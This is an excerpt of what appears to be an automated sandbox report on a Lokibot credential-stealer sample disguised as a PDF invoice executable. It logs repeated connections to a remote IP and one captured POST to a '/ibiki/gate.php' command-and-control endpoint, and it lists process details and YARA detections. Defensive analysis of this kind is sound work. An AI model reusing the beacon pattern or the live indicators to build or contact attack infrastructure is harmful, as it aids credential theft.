                                    88192.168.2.34981047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    89192.168.2.34981147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    9192.168.2.34971847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:32.492296934 CET77OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:32.556118011 CET77INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:49 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    90192.168.2.34981247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    91192.168.2.34981347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    92192.168.2.34981447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    93192.168.2.34981547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    94192.168.2.34981647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    95192.168.2.34981747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    96192.168.2.34981847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    97192.168.2.34981947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    98192.168.2.34982047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    99192.168.2.34982147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: PI_Nov9071011998_ENTRUSTpdf.exe PID: 3476 Parent PID: 5668

                                    General

                                    Start time:10:02:19
                                    Start date:03/12/2020
                                    Path:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe'
                                    Imagebase:0xc10000
                                    File size:359424 bytes
                                    MD5 hash:2349D50A67C2EF85661EF2BE6DEF2CC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    Analysis Process: PI_Nov9071011998_ENTRUSTpdf.exe PID: 5572 Parent PID: 3476

                                    General

                                    Start time:10:02:25
                                    Start date:03/12/2020
                                    Path:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:{path}
                                    Imagebase:0xa60000
                                    File size:359424 bytes
                                    MD5 hash:2349D50A67C2EF85661EF2BE6DEF2CC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Disassembly

                                    Code Analysis

                                    Reset < >